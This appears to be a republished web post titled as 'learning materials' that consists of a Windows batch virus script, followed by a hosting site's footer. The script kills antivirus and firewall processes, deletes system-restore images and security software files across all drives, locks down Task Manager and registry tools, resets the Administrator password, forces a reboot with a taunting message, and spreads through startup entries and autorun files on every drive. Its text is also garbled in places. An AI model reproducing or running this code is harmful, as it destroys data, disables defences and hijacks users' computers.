Super batch virus, good learning materials _dos/bat

Source: Internet
Author: User
@echo off
Title You DEAD!!!!!!!
Set Taskkill=s
Copy%0%windir%\system32\cmd.bat
attrib%windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s%/im pfw.exe shadowtip.exe shadowservice.exe qq.exe. exe/f >nul
%s%/im norton*/F >nul
%s%/im av*/F >nul
%s%/im fire*/F >nul
%s%/im anti*/F >nul
%s%/im spy*/F >nul
%s%/im bullguard/f >nul
%s%/im persfw/f >nul
%s%/im kav*/F >nul
%s%/im zonealarm/f >nul
%s%/im safeweb/f >nul
%s%/im outpost/f >nul
%s%/im nv*/F >nul
%s%/im nav*/F >nul
%s%/im f-*/F >nul
%s%/im esafe/f >nul
%s%/im cle/f >nul
%s%/im blackice/f >nul
%s%/im def*/F >nul
%s%/im 360safe.exe/f >nul
net stop Shadow "System" Service
Set Alldrive=d E F g h i j k l m n o p q R S t u v w x y Z
For%%a in (c%alldrive%) do del%%a:\360*/f/s/q >nul
For%%a in (c%alldrive%) do del%%a:\ repair */f/s/q >nul
REM Modify registry ....
REG ADD hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall/v
checkedvalue/t reg_dword/d 00000000/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v norun/t reg_dword/d
00000001/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v norecentdocsmenu/t
REG_DWORD/D 00000001/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v nodrives/t reg_dword/d
4294967295/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\system/v disableregistrytools/t
REG_DWORD/D 00000002/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v nonethood/t reg_dword/d
00000001/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v nodesktop/t reg_dword/d
00000001/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v noclose/t reg_dword/d
00000001/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v nofind/t reg_dword/d
00000001/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\system/v disabletaskmgr/t REG_DWORD
/d 00000001/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v nologoff/t reg_dword/d
00000001/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v nosettaskbar/t REG_DWORD
/d 00000001/f >nul
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows "" Nt\currentversion\systemrestore/v disablesr/t reg_dword/d
00000001/f >nul
REG ADD hkey_local_machine\software\policies\microsoft\windows "" Nt\systemrestore/v disableconfig/t reg_dword/d
00000001/f >nul
REG ADD hkey_current_user\software\microsoft\windows\currentversion\policies\explorer/v restrictrun/t reg_dword/d
00000001/f >nul
Cls
NET User Administrator 123456 >nul
For%%c in (c%alldrive%) do del%%c:\*.gho/f/s/q >nul
echo @echo off >d:\setup.bat
echo Shutdown-r-T 10-f-C dear friend, I am very sorry to inform you that your computer has been severely crashed, please reinstall the system to resolve this issue
!^.^ >>d:\setup.bat
echo Copy D:\setup.bat c:\Documents "and" "Settings\All" "users\" Start "menu \ Program \ start \a.bat >>d:\setup.bat
echo REG ADD hkey_local_machine\software\microsoft\windows\currentversion\run/v setup.bat/t reg_sz/d d:\setup.bat
/F >>d:\setup.bat
echo REG ADD hkey_current_user\software\microsoft\windows\currentversion\run/v setup.bat/t reg_sz/d d:\setup.bat
/F >>d:\setup.bat
echo REG ADD hkey_local_machine\software\microsoft\windows\currentversion\runonce/v setup.bat/t reg_sz/d d:\ Setup.bat
/F >>d:\setup.bat
hkey_classes_root\batfile\shell\open\command/v setup.bat/t reg_sz/d d:\setup.bat/f >>d:\setup.bat
echo [Windows] >>%windir%\win.ini
Echo Run=d:\setup.bat C:\AUTOEXEC. BAT >>%windir%\win.ini
Echo Load=d:\setup.bat C:\AUTOEXEC. BAT >>%windir%\win.ini
echo [boot] >>%windir%\system.ini
echo Shell=Explorer.exe Setup.bat C:\AUTOEXEC. BAT >>%windir%\system.ini
echo [AutoRun] >d:\autorun.inf
Echo Open=setup.bat >>d:\autorun.inf
Echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf +r +s +h >>d:\setup.bat
attrib d:\setup.bat +r +s +h >>d:\setup.bat
Start D:\setup.bat/min >nul
echo @echo off >>c:\autoexec. BAT
echo REG ADD hkey_local_machine\software\microsoft\windows\currentversion\run/v AUTOEXEC. bat/t reg_sz/d
C:\AUTOEXEC. bat/f >>c:\autoexec. BAT
echo REG ADD hkey_current_user\software\microsoft\windows\currentversion\run/v AUTOEXEC. bat/t reg_sz/d
C:\AUTOEXEC. bat/f >>c:\autoexec. BAT
REG ADD hkey_local_machine\software\microsoft\windows\currentversion\runonce/v AUTOEXEC. bat/t reg_sz/d
C:\AUTOEXEC. bat/f >>c:\autoexec. BAT
echo REG ADD hkey_local_machine\software\microsoft\windows\currentversion\run/v setup.bat/t reg_sz/d d:\setup.bat
/F >>c:\autoexec. BAT
echo REG ADD hkey_current_user\software\microsoft\windows\currentversion\run/v setup.bat/t reg_sz/d d:\setup.bat
/F >>c:\autoexec. BAT
REG ADD hkey_local_machine\software\microsoft\windows\currentversion\runonce/v setup.bat/t reg_sz/d d:\setup.bat
/F >>c:\autoexec. BAT
echo if not d:\setup.bat start%windir%\system32\cmd.bat/min >>c:\autoexec. BAT
Copy%0%systemroot%\windows.bat >nul
If not exist%windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
If not exist C:\AUTOEXEC. BAT Start%windir%\system32\cmd.bat/min >>%windir%/system32/explorer.bat
If not exist%windir%\system32\cmd.bat start%systemroot%\windows.bat/min >>%windir%/system32/explorer.bat
echo REG ADD hkey_local_machine\software\microsoft\windows\currentversion\run/v AUTOEXEC. bat/t reg_sz/d
C:\AUTOEXEC. bat/f >>%windir%/system32/explorer.bat
echo REG ADD hkey_current_user\software\microsoft\windows\currentversion\run/v AUTOEXEC. bat/t reg_sz/d
C:\AUTOEXEC. bat/f >>%windir%/system32/explorer.bat
echo REG ADD hkey_local_machine\software\microsoft\windows\currentversion\run/v setup.bat/t reg_sz/d d:\setup.bat
/F >>%windir%/system32/explorer.bat
echo REG ADD hkey_current_user\software\microsoft\windows\currentversion\run/v setup.bat/t reg_sz/d d:\setup.bat
/F >>%windir%/system32/explorer.bat
echo REG ADD hkey_local_machine\software\microsoft\windows\currentversion\run/v explorer.bat/t reg_sz/d%
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD hkey_current_user\software\microsoft\windows\currentversion\run/v explorer.bat/t reg_sz/d%
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo Start%systemroot%\windows.bat/min >>%windir%/system32/explorer.bat
attrib%windir%/system32/explorer.bat +r +s +h%
attrib%systemroot%/windows.bat +r +s +h
For%%c in (%alldrive%) does echo @echo off >>%%c:\system.bat
For%%c in (%alldrive%) do echo start%windir%\system32\cmd.bat/min >>%%c:\system.bat
For%%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
Set drive=e f g h i j k l m n o p q R S t u v w x y Z
For%%c in (%drive%) do echo [Aurorun] >%%c:\autorun.inf
For%%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
Copy%0 D:\Program "" Files\run.bat
For%%c in (%alldrive%) does echo if not exist%windir%/system32/explorer.bat start D:\Program "" Files\run.bat/min
>>%%c:\system.bat
For%%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
For%%c in (%alldrive%) do attrib%%c:\autorun.inf +r +s +h >nul
For%%c in (%alldrive%) do attrib%%c:\system.bat +r +s +h >nul
If not exist%windir%/system32/explorer.bat start D:\Program "" Files\run.bat/min >>d:\setup.bat
attrib D:\Program "" Files\run.bat +r +s +h >nul
Del%0
Exit

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.